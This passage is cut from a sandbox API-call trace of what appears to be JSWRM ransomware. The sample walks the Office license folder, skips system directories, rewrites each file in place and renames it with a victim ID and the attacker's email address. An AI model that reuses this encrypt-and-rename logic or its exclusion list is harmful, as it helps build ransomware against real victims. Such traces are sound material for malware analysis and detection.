cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 47 [0105.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0105.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0105.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0105.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0105.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.678] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23860) returned 1 [0105.678] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5d30) returned 0x24c1d0 [0105.678] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5d30, lpOverlapped=0x0) returned 1 [0105.681] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.681] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5d30, lpOverlapped=0x0) returned 1 [0105.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.681] CloseHandle (hObject=0x45c) returned 1 [0105.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0105.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0105.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0105.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0105.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0105.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.681] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0105.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0105.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.682] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6fb21bb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6fb21bb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe709702b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2dae, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="O3F0C0~1.XRM")) returned 1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.682] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0105.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0105.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0105.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=50, lpMultiByteStr=0x20d698, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 50 [0105.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0105.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0105.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0105.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0105.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 50 [0105.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0105.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0105.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0105.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0105.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.683] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11694) returned 1 [0105.683] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2da0) returned 0x24c1d0 [0105.683] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2da0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2da0, lpOverlapped=0x0) returned 1 [0105.698] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.698] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2da0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2da0, lpOverlapped=0x0) returned 1 [0105.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.699] CloseHandle (hObject=0x45c) returned 1 [0105.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0105.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0105.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0105.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0105.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0105.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0105.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.700] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0105.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0105.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0105.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0105.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0105.701] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6fb21bb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6fb21bb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe704ab39, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5ce0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Grace-ppd.xrm-ms", cAlternateFileName="O3AE55~1.XRM")) returned 1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.701] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0105.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0105.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0105.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0105.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0105.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0105.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0105.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0105.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0105.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0105.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0105.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.702] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23776) returned 1 [0105.702] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ce0) returned 0x24c1d0 [0105.702] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ce0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ce0, lpOverlapped=0x0) returned 1 [0105.711] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.711] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ce0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ce0, lpOverlapped=0x0) returned 1 [0105.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.712] CloseHandle (hObject=0x45c) returned 1 [0105.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0105.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0105.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0105.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0105.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0105.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0105.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.712] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0105.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0105.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0105.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.713] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6f65cfb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6f65cfb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7024919, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Grace-ul-oob.xrm-ms", cAlternateFileName="O310E0~1.XRM")) returned 1 [0105.713] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.713] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.713] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.713] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.713] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.713] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.713] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.713] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.713] lstrcmpiW (lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.714] lstrcmpiW 